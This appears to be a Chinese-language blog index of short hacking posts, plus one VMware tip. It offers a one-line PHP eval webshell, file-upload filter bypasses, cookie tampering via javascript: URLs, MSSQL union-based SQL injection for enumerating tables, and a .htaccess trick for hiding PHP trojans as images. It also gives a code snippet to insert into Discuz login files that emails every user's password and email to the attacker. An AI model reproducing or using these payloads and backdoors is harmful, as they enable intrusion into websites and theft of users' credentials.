显示标签为“技术文章”的博文。显示所有博文
显示标签为“技术文章”的博文。显示所有博文

2011年11月19日星期六

【原创】浅析php后门木马

php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?
本文为您浅析说明一些php后门木马常用的函数

php后门木马常用的函数大致上可分为四种类型:
1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open
2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite
4. .htaccess: SetHandler, auto_prepend_file, auto_append_file

详文请查看pdf

2011年3月24日星期四

Mac OS + VMWare 开机卡在白苹果页面

尝试在vmware 7.1下安装mac os 10.6.x, 试了几个版本,安装时都没问题,但是只要一重启就卡在开机白苹果页面,苹果下面的风火轮都没出现。经过反复的测试,发现只要在.vmx文件下加入这行就能完美开机了:
firmware = "efi"

2010年6月5日星期六

Dos 下写php一句话

echo "<?php eval($_POST[cmd]);?>" >> try.php

2010年2月3日星期三

上传漏洞

很多网站都能让用户上传文件,我们就可以尝试以下方法上传后门:

1. 直接上传木马。
2. 上传时在后缀加空格或加几点。

木马.asp 这里后面有一个空格
木马.asp..
3. 双重扩展名:
木马.jpg.asp
4. IIS 漏洞
木马.asp;1.jpg
5. Apache 漏洞
木马.php.jpg

Cookies 显示及修改

在网址栏打上这个代码:
javascript:alert(document.cookie);
会跳出一个框框,显示当前页面所储存的cookie

在网址栏打上这个代码:
javascript:void(document.cookie="username=admin");
就能达到修改特定cookie内容的目的(因站而异)

【原创】discuz密码记录+电邮

Discuz 7.1/7.2 :include\login.func.php
Discuz 7.0:logging.php

搜索这段代码:

if(!$member) {
return -1;
}

在下面加入:

$title= $tmp['username'].' : '.$tmp['password'].' : '.$tmp['email'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);

如果是要较完整的资料可以使用以下代码:
$title= $_SERVER['HTTP_HOST'];
$msg='Username:'.$tmp['username'].' Password:'.$tmp['password'].' Email:'.$tmp['email'].' Question ID:'.$questionid.' Answer:'.$answer.' Date:'.date(DATE_RFC822).'\r\n';
$mailto='email@email.com';//这里改为你自己的电邮
$mailfrom = 'From: '.$tmp['email'];
mail($mailto,$title,$msg,$mailfrom);

2010年1月28日星期四

MSSQL 分析表名

MSSQL下分析表名的方法:

1。先db_name()分析出数据库名
~and 1=2 union select db_name()

2。接着用以下语句分析表名(假设数据库名为dbname)
~and 1=2 union all select name from dbname..sysobjects WHERE xtype = 'U' AND name NOT IN(SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55)

2010年1月27日星期三

【原创】另类隐藏PHP木马的方法

运行环境:Linux + apache

将php木马后缀改成图片类后缀,然后在木马目录或其根目录创建一个.htaccess文件(或 在原有的.htaccess文件中加入)
<filesmatch "文件名">
SetHandler application/x-httpd-php
</filesmatch>

例:1.jpg
<filesmatch "1.jpg">
SetHandler application/x-httpd-php
</filesmatch>